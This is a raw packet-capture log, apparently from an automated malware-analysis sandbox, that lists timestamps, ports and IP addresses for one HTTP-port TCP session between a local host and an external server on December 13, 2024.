Dec 13, 2024 01:37:13.223078012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.223171949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.223215103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.223963976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.224045992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.224091053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.224878073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.224976063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.225023031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.225792885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.225904942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.225964069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.226692915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.226805925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.226849079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.227571011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.270309925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.371659994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.371737003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.371849060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.371948004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.372237921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.372282028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.372334957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.373091936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.373142958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.373172998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.374000072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.374047995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.374103069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.374907970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.374950886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.374999046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.375823975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.375864983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.375914097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.376734972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.376779079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.376826048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.377650023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.377702951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.377733946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.378542900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.378583908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.378654003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.379467010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.379508018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.379597902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.380377054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.380419970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.380469084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.381309032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.381366014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.381412983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.382184029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.382225990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.382272959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.383105040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.383145094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.383218050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.384030104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.384069920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.384145021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.384938002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.384982109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.385094881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.385834932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.385890007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.385921001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.386730909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.386781931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.386898041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.387639046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.387684107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.387733936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.388555050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.388607025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.388660908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.389470100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.389516115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.389560938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.390372038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.390422106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.390458107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.391288996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.391344070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.391392946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.392193079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.392277002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.392304897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.393100977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.393146038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.393192053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.394026041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.394072056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.394114017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.394908905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.394957066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.395009041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.395838022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.395895004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.395956993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.396756887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.396805048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.396845102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.397644043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.397687912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.397736073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.398588896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.398638964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.398674011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.399455070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.399501085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.399553061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.400363922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.400424004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.400471926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.401281118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.401336908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.401381016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.402230978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.402277946 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.402323961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.403115034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.403192043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.403238058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.404115915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.404160976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.404205084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.404972076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.405010939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.405067921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.405849934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.405898094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.405942917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.406759977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.406809092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.406825066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.407666922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.407722950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.407763004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.408580065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.408637047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.408674955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.409471989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.409517050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.409563065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.410413980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.410454988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.410511017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.411329985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.411379099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.411448956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.412242889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.412286997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.412316084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.413177967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.413212061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.413240910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.414031982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.414077044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.414123058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.414930105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.414972067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.414999008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.415836096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.415878057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.415925026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.416747093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.416791916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.416852951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.417644024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.417685986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.417777061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.418612003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.418653965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.418683052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.473411083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.563723087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.563899040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.564066887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.564155102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.564297915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.564342976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.565052986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.565156937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.565206051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.565946102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.566029072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.566072941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.566871881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.566994905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.567053080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.567774057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.567888021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.567929983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.568686962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.568804026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.568844080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.569578886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.569694042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.569734097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.570569038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.570635080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.570689917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.571441889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.571564913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.571616888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.572314024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.572428942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.572624922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.573249102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.573359013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.573400974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.574121952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.574254036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.574294090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.575076103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.575181961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.575227976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.575978994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.576117992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.576174021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.576961994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.576982975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.577048063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.577769041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.577888012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.577986002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.578680038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.578850031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.578912020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.579590082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.579694033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.579747915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.580490112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.580610037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.580672026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.581429958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.581548929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.581604958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.582343102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.582469940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.582530022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.583231926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.583349943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.583415985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.584153891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.584256887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.584316969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.585040092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.585165977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.585226059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.585951090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.586074114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.586132050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.586905003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.586962938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.587021112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.587790012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.587899923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.587964058 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.588943005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.589322090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.589384079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.589598894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.589699984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.589754105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.590506077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.590614080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.590729952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.591430902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.591501951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.591557980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.592330933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.592436075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.592504025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.593230009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.593347073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.593405008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.594142914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.594254971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.594314098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.595057964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.595161915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.595220089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.595977068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.596091032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.596147060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.596858025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.596992970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.597049952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.597785950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.597899914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.597974062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.598690033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.598776102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.598831892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.599669933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.599852085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.599905968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.600531101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.600667000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.600728035 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.601423025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.601556063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.601610899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.602329016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.602442026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.602503061 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.603239059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.603380919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.603440046 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.604155064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.604266882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.604320049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.605057001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.605165958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.605217934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.605995893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.606097937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.606149912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.606889009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.607000113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.607055902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.607798100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.607919931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.607971907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.608700037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.608817101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.608870983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.609596968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.609705925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.609760046 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.610519886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.610619068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.610670090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.611396074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.660923004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.755691051 CET	80	49707	185.81.68.147	192.168.2.5
